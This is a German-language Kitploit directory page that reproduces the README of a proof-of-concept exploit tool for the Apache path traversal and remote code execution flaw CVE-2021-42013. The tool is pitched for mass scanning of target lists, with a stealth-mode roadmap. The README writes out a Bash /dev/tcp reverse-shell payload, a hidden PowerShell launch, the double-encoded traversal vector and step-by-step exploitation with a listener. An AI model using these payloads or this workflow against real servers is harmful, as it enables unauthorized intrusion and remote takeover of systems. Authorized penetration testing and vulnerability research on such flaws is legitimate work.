Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
POC-CVE-2021-42013-EXPLOIT — Ein fortschrittliches Tool zum Scannen, Ausnutzen und zur Ferninteraktion, das entwickelt wurde, um die Apache Path Traversal + RCE Schwachstelle (CVE-2021-42013) in falsch konfigurierten Servern zu erkennen und auszunutzen. | Kitploit
Tools/GitHubGitHub/makavellik/poc-cve-2021-42013-exploit
AufklärungSchwachstellenscannerPayload-GenerierungExploitationShellcodeWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsCommand and Control

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Remote-Access-Tool
GitHubmakavellik/poc-cve-2021-42013-exploit

POC-CVE-2021-42013-EXPLOIT

Ein fortschrittliches Tool zum Scannen, Ausnutzen und zur Ferninteraktion, das entwickelt wurde, um die Apache Path Traversal + RCE Schwachstelle (CVE-2021-42013) in falsch konfigurierten Servern zu erkennen und auszunutzen.

Repository anzeigen
4vor 1 JahrNoch nicht geprüft
Teilen

Typing SVG

banner

Python Lizenz MIT Aktiv Stealth-Modus Symbiose


root@kitploit:~
# 🔥 CVE-2021-42013 Exploit Framework by Makaveli

> 💀 Multidimensionaler Kosmischer Hacker-Modus aktiviert...

Ein fortschrittliches Tool zum Scannen, Exploitieren und zur Ferninteraktion, das entwickelt wurde, um die Sicherheitslücke **Apache Path Traversal + RCE (CVE-2021-42013)** auf falsch konfigurierten Servern zu erkennen und auszunutzen.

---

## ⚠️ Rechtlicher Hinweis

> Diese Software wird ausschließlich zu Bildungs- und Forschungszwecken in kontrollierten Umgebungen bereitgestellt.

Die Verwendung dieses Tools gegen Systeme ohne ausdrückliche Genehmigung kann illegal sein und in vielen Ländern eine Straftat darstellen.

Der Autor übernimmt keine Haftung für die missbräuchliche Verwendung dieses Codes. Verwenden Sie ihn auf eigenes Risiko und nur mit ausdrücklicher Erlaubnis des Eigentümers des Zielsystems.

---

 🧠 Technische Beschreibung

Dieses Tool ermöglicht:

- ✅ Scannen mehrerer Ziele aus einer `.txt`-Datei.
- ✅ Automatische Erkennung des Vorhandenseins von CVE-2021-42013.
- ✅ Identifikation des entfernten Betriebssystems (Linux oder Windows).
- ✅ Senden maßgeschneiderter Payloads basierend auf dem erkannten System.
- ✅ Aufbau einer Reverse Shell und Erlangen von Remote-Zugriff.
- ✅ Echtzeit-Interaktion mit der Shell über einen integrierten Listener.
- ✅ Erweiterte Logs, Fortschrittsbalken und interaktives Menü.

---

## 🔧 Voraussetzungen

- Python **3.8+**
- Unix/Linux/MacOS-basierte Systeme (Verwendung von `subprocess` und `curl`)
- Erfordert die folgenden Python-Bibliotheken:

```bash
pip install -r requirements.txt

requirements.txt

root@kitploit:~
rich
alive-progress

Außerdem muss curl auf dem Betriebssystem installiert sein.


📁 Dateistruktur

root@kitploit:~
.
├── POC-CVE.py       # Hauptskript
├── logs.txt              # Automatisch generierte Logdatei
├── requirements.txt      # Python-Abhängigkeiten
└── targets.txt           # (Optional) Liste der zu scannenden URLs

🚀 Interaktive Nutzung

root@kitploit:~
python3 POC-CVE.py

Wählen Sie zwischen:

  • scan_file: Scannt mehrere URLs aus einer Datei und zeigt an, welche anfällig sind.
  • exploit: Direkte Exploitation eines einzelnen Ziels mit Reverse Shell.
  • exit: Beendet den interaktiven Modus.

🔍 Massenscan (scan_file)

  1. Erstellen Sie eine Datei mit einer Liste von URLs, eine pro Zeile:
root@kitploit:~
http://example.com
http://victim.net
http://192.168.1.100
  1. Starten Sie den Scan:
root@kitploit:~
python3 POC-CVE.py

Wählen Sie scan_file und geben Sie Folgendes an:

  • Den Pfad zur Datei
  • Die Anzahl der Threads für den parallelen Scan

💥 Exploitation (exploit)

  1. Wählen Sie exploit im Menü.
  2. Geben Sie ein:
  • Die URL des Ziels
  • Ihre lokale IP (LHOST) zum Empfangen der Shell
  • Einen freien Port (LPORT) für den Listener

Das Skript:

  • Erkennt, ob das Ziel anfällig ist.
  • Sendet einen geeigneten Payload basierend auf dem entfernten Betriebssystem.
  • Öffnet einen Listener und gewährt Ihnen interaktiven Zugriff.

🧪 Beispiel-Payloads

Linux Payload (Bash TCP Reverse Shell)

root@kitploit:~
bash -c 'exec 124<>/dev/tcp/LHOST/LPORT;sh <&124 >&124 2>&124'

Windows Payload (PowerShell TCP Reverse Shell)

root@kitploit:~
powershell -NoP -NonI -W Hidden -Command ...

🧠 Verwendete Techniken

  • Path Traversal mit doppelter Kodierung (/.%252e/.%252e/.%252e)
  • Befehlsinjektion über curl
  • Umgehungs-Header (User-Agent, Accept, etc.)
  • Reverse Shell zur Übernahme der Fernsteuerung
  • Multithreading und Fortschrittsbalken (Alive Progress)
  • Logging mit Zeitstempeln und Rich Console

📌 CVE Referenz

  • CVE-ID: CVE-2021-42013
  • Angriffsvektor: GET /cgi-bin/.%%32%65/.%%32%65/...
  • Auswirkung: RCE (Remote Code Execution)
  • CVSS-Score: 9.8 (Kritisch)

🧙‍♂️ Autor

  • ✨ Makaveli — "Hacke deine eigene Realität"

🛡️ Haftungsausschluss

Dieses Projekt wird "wie besehen" bereitgestellt, ohne Gewährleistung oder Haftung für Schäden, die durch seine Nutzung entstehen. Scannen oder exploitieren Sie niemals ein System ohne die ausdrückliche Zustimmung seines Eigentümers.


✅ Best Practices

  • Verwenden Sie dieses Skript ausschließlich in Laborumgebungen oder autorisierten Tests.
  • Stellen Sie sicher, dass der für den Listener definierte Port offen und nicht durch eine Firewall blockiert ist.
  • Führen Sie es als normaler Benutzer (nicht root) aus, es sei denn, es ist unbedingt erforderlich.

🧩 Zukünftige Roadmap (Optional)

  • Unterstützung für benutzerdefinierte Payloads
  • Export der Ergebnisse nach CSV/JSON
  • Stealth-Modus mit Header-Rotation und TOR-Proxy
  • Lokale Weboberfläche (Flask)
root@kitploit:~

---


@DonMakaveliw, Bist du bereit, die Zukunft zu erschaffen?

Tool herunterladen